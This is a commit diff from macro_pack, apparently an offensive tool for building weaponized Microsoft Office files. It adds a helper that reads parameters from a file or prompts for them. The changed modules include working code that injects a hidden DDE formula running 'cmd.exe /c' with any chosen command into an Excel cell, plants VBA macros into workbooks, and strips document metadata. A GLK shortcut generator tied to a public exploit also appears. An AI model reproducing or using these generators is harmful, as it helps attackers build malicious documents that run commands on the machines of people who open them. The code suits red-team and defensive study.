Add user friendliness in various formats generation

sevagas · Apr 10, 2018 · 8311926 · 8311926
1 parent 2bccf71
commit 8311926
Show file tree

Hide file tree

Showing 11 changed files with 333 additions and 329 deletions.
diff --git a/src/macro_pack.py b/src/macro_pack.py
@@ -280,6 +280,9 @@ def main(argv):
         if os.isatty(0) == False: # check if something is being piped
             logging.info("   [-] Waiting for piped input feed...")  
             mpSession.stdinContent = sys.stdin.readlines()
+            # Close Stdin pipe so we can call input() later without triggering EOF
+            #sys.stdin.close()
+            sys.stdin = sys.__stdin__
     else:
         if not os.path.isfile(mpSession.vbaInput):
             logging.error("   [!] ERROR: Could not find %s!" % mpSession.vbaInput)
@@ -385,18 +388,6 @@ def main(argv):
     except Exception:
         logging.exception(" [!] Exception caught!")
 
-        logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
-        if sys.platform == "win32":
-            logging.error(" [!] Attempt to force close MS Office applications...")
-            objExcel = win32com.client.Dispatch("Excel.Application")
-            objExcel.Application.Quit()
-            del objExcel
-            objWord = win32com.client.Dispatch("Word.Application")
-            objWord.Application.Quit()
-            del objWord
-            ppt = win32com.client.Dispatch("PowerPoint.Application")
-            ppt.Quit()
-            del ppt
 
     logging.info(" [+] Cleaning...")
     shutil.rmtree(WORKING_DIR)   

diff --git a/src/modules/excel_dde.py b/src/modules/excel_dde.py
@@ -3,6 +3,7 @@
 
 # Only enabled on windows
 import sys
+from collections import OrderedDict
 if sys.platform == "win32":
     # Download and install pywin32 from https://sourceforge.net/projects/pywin32/files/pywin32/
     import win32com.client # @UnresolvedImport
@@ -19,39 +20,43 @@ class ExcelDDE(ExcelGenerator):
 
     def run(self):
         logging.info(" [+] Generating MS Excel with DDE document...")
-
-        # Read command file
-        commandFile =self.getCMDFile()    
-        if commandFile == "":
-            logging.error("   [!] Could not find cmd input!")
-            return
-
-        logging.info("   [-] Open document...")
-        # open up an instance of Excel with the win32com driver\        \\
-        excel = win32com.client.Dispatch("Excel.Application")
-        # do the operation in background without actually opening Excel
-        excel.Visible = False
-        workbook = excel.Workbooks.Open(self.outputFilePath)
-
-        logging.info("   [-] Inject DDE field (Answer 'No' to popup)...")
-        with open (commandFile, "r") as f:
-            command=f.read()
-
-        ddeCmd = r"""=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c %s'!A1""" % command.rstrip()
-        excel.Cells(1, 26).Formula = ddeCmd
-        excel.Cells(1, 26).FormulaHidden = True
-
-        # Remove Informations
-        logging.info("   [-] Remove hidden data and personal info...")
-        xlRDIAll=99
-        workbook.RemoveDocumentInformation(xlRDIAll)
-        logging.info("   [-] Save Document...")
-        excel.DisplayAlerts=False
-        excel.Workbooks(1).Close(SaveChanges=1)
-        excel.Application.Quit()
-        # garbage collection
-        del excel
-        logging.info("   [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
+        try:
+            # Get command line
+            paramDict = OrderedDict([("Cmd_Line",None)])      
+            self.fillInputParams(paramDict)
+            command = paramDict["Cmd_Line"]
+
+            logging.info("   [-] Open document...")
+            # open up an instance of Excel with the win32com driver\        \\
+            excel = win32com.client.Dispatch("Excel.Application")
+            # do the operation in background without actually opening Excel
+            excel.Visible = False
+            workbook = excel.Workbooks.Open(self.outputFilePath)
+
+            logging.info("   [-] Inject DDE field (Answer 'No' to popup)...")
+
+            ddeCmd = r"""=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c %s'!A1""" % command.rstrip()
+            excel.Cells(1, 26).Formula = ddeCmd
+            excel.Cells(1, 26).FormulaHidden = True
+
+            # Remove Informations
+            logging.info("   [-] Remove hidden data and personal info...")
+            xlRDIAll=99
+            workbook.RemoveDocumentInformation(xlRDIAll)
+            logging.info("   [-] Save Document...")
+            excel.DisplayAlerts=False
+            excel.Workbooks(1).Close(SaveChanges=1)
+            excel.Application.Quit()
+            # garbage collection
+            del excel
+            logging.info("   [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
 
-
+        except Exception:
+            logging.exception(" [!] Exception caught!")
+            logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
+            logging.error(" [!] Attempt to force close MS Excel applications...")
+            objExcel = win32com.client.Dispatch("Excel.Application")
+            objExcel.Application.Quit()
+            del objExcel
+
 
diff --git a/src/modules/excel_gen.py b/src/modules/excel_gen.py
@@ -66,58 +66,68 @@ def check(self):
     def generate(self):
 
         logging.info(" [+] Generating MS Excel document...")
-        self.enableVbom()
-
-        # open up an instance of Excel with the win32com driver\        \\
-        excel = win32com.client.Dispatch("Excel.Application")
-        # do the operation in background without actually opening Excel
-        excel.Visible = False
-        # open the excel workbook from the specified file or create if file does not exist
-        logging.info("   [-] Open workbook...")
-        workbook = excel.Workbooks.Add()
-
-        self.resetVBAEntryPoint()
-        logging.info("   [-] Inject VBA...")
-        # Read generated files
-        for vbaFile in self.getVBAFiles():
-            if vbaFile == self.getMainVBAFile():       
-                with open (vbaFile, "r") as f:
-                    macro=f.read()
-                    # Add the main macro- into ThisWorkbook part of excel file
-                    excelModule = workbook.VBProject.VBComponents("ThisWorkbook")
-                    excelModule.CodeModule.AddFromString(macro)
-            else: # inject other vba files as modules
-                with open (vbaFile, "r") as f:
-                    macro=f.read()
-                    excelModule = workbook.VBProject.VBComponents.Add(1)
-                    excelModule.Name = os.path.splitext(os.path.basename(vbaFile))[0]
-                    excelModule.CodeModule.AddFromString(macro)
-
-        excel.DisplayAlerts=False
-        # Remove Informations
-        logging.info("   [-] Remove hidden data and personal info...")
-        xlRDIAll=99
-        workbook.RemoveDocumentInformation(xlRDIAll)
-
-        logging.info("   [-] Save workbook...")
-        xlOpenXMLWorkbookMacroEnabled = 52
-        xlExcel8 = 56
-        xlOpenXMLWorkbook = 51
-        if self.outputFileType == MSTypes.XL97:
-            workbook.SaveAs(self.outputFilePath, FileFormat=xlExcel8)
-        elif MSTypes.XL == self.outputFileType and ".xlsx" in self.outputFilePath:
-            workbook.SaveAs(self.outputFilePath, FileFormat=xlOpenXMLWorkbook)
-        elif self.outputFileType == MSTypes.XL and ".xlsm" in self.outputFilePath:
-            workbook.SaveAs(self.outputFilePath, FileFormat=xlOpenXMLWorkbookMacroEnabled)
-        # save the workbook and close
-        excel.Workbooks(1).Close(SaveChanges=1)
-        excel.Application.Quit()
-        # garbage collection
-        del excel
-
-        self.disableVbom()
+        try:
+            self.enableVbom()
+
+            # open up an instance of Excel with the win32com driver\        \\
+            excel = win32com.client.Dispatch("Excel.Application")
+            # do the operation in background without actually opening Excel
+            excel.Visible = False
+            # open the excel workbook from the specified file or create if file does not exist
+            logging.info("   [-] Open workbook...")
+            workbook = excel.Workbooks.Add()
+
+            self.resetVBAEntryPoint()
+            logging.info("   [-] Inject VBA...")
+            # Read generated files
+            for vbaFile in self.getVBAFiles():
+                if vbaFile == self.getMainVBAFile():       
+                    with open (vbaFile, "r") as f:
+                        macro=f.read()
+                        # Add the main macro- into ThisWorkbook part of excel file
+                        excelModule = workbook.VBProject.VBComponents("ThisWorkbook")
+                        excelModule.CodeModule.AddFromString(macro)
+                else: # inject other vba files as modules
+                    with open (vbaFile, "r") as f:
+                        macro=f.read()
+                        excelModule = workbook.VBProject.VBComponents.Add(1)
+                        excelModule.Name = os.path.splitext(os.path.basename(vbaFile))[0]
+                        excelModule.CodeModule.AddFromString(macro)
+
+            excel.DisplayAlerts=False
+            # Remove Informations
+            logging.info("   [-] Remove hidden data and personal info...")
+            xlRDIAll=99
+            workbook.RemoveDocumentInformation(xlRDIAll)
+
+            logging.info("   [-] Save workbook...")
+            xlOpenXMLWorkbookMacroEnabled = 52
+            xlExcel8 = 56
+            xlOpenXMLWorkbook = 51
+            if self.outputFileType == MSTypes.XL97:
+                workbook.SaveAs(self.outputFilePath, FileFormat=xlExcel8)
+            elif MSTypes.XL == self.outputFileType and ".xlsx" in self.outputFilePath:
+                workbook.SaveAs(self.outputFilePath, FileFormat=xlOpenXMLWorkbook)
+            elif self.outputFileType == MSTypes.XL and ".xlsm" in self.outputFilePath:
+                workbook.SaveAs(self.outputFilePath, FileFormat=xlOpenXMLWorkbookMacroEnabled)
+            # save the workbook and close
+            excel.Workbooks(1).Close(SaveChanges=1)
+            excel.Application.Quit()
+            # garbage collection
+            del excel
+
+            self.disableVbom()
+
+            logging.info("   [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
+            logging.info("   [-] Test with : \nmacro_pack.exe --run %s\n" % self.outputFilePath)
+
+        except Exception:
+            logging.exception(" [!] Exception caught!")
+            logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
+            logging.error(" [!] Attempt to force close MS Excel applications...")
+            objExcel = win32com.client.Dispatch("Excel.Application")
+            objExcel.Application.Quit()
+            del objExcel
 
-        logging.info("   [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
-        logging.info("   [-] Test with : \nmacro_pack.exe --run %s\n" % self.outputFilePath)
 
 
diff --git a/src/modules/glk_gen.py b/src/modules/glk_gen.py
@@ -3,6 +3,7 @@
 
 import logging
 from modules.mp_generator import Generator
+from collections import OrderedDict
 
 """
 See https://www.exploit-db.com/exploits/42994/
@@ -31,19 +32,12 @@ def check(self):
     def generate(self):
 
         logging.info(" [+] Generating %s file..." % self.outputFileType)
-
-        # Read command file
-        commandFile =self.getCMDFile()    
-        if commandFile == "":
-            logging.error("   [!] Could not find cmd input!")
-            return()
-
-        with open (commandFile, "r") as f:
-            targetUrl=f.read()[:-1]
+        paramDict = OrderedDict([("targetUrl",None)])      
+        self.fillInputParams(paramDict)
 
         # Complete template
         glkContent = GLK_TEMPLATE
-        glkContent = glkContent.replace("<<<URL>>>", targetUrl)
+        glkContent = glkContent.replace("<<<URL>>>", paramDict["targetUrl"])
 
         # Write in new SCF file
         f = open(self.outputFilePath, 'w')

diff --git a/src/modules/mp_module.py b/src/modules/mp_module.py
@@ -4,6 +4,7 @@
 import os, mmap, logging,re
 from common import utils
 from common.utils import MSTypes
+import shlex
 
 class MpModule():
     def __init__(self,mpSession):
@@ -71,6 +72,38 @@ def getCMDFile(self):
             return ""
 
 
+    def fillInputParams(self, paramDict):
+        """ 
+        Fill parameters dictionnary using given input. If input is missing, ask for input to user 
+        """
+        # Fill parameters based on input file
+        cmdFile = self.getCMDFile()
+        if cmdFile is not None and cmdFile != "":
+            f = open(cmdFile, 'r')
+            valuesFileContent = f.read()
+            f.close()
+            os.remove(cmdFile)
+            inputValues = shlex.split(valuesFileContent)# split on space but preserve what is between quotes
+            if len(inputValues) == len(paramDict): 
+                i = 0  
+                # Fill entry parameterds
+                for key, value in paramDict.items():
+                    paramDict[key] = inputValues[i]
+                    i += 1
+            else:
+                logging.error("   [!] Incorrect number of provided input parameters (%d provided where this features needs %d).\n    Required parameters: %s\n" % (len(inputValues),len(paramDict), list(paramDict.keys())))
+                return
+        else:
+            # if input was not provided
+            logging.warn("   [!] Could not find input parameters. Please provide the next values:")
+            for key, value in paramDict.items():
+                if value is None or value == "" or value.isspace():
+                    newValue = None
+                    while newValue is None or newValue == "" or newValue.isspace():
+                        newValue = input("    %s:" % key)
+                    paramDict[key] = newValue
+
+
     def getMainVBAFile(self):
         """ return main vba file (the one containing macro entry point) """
         result = ""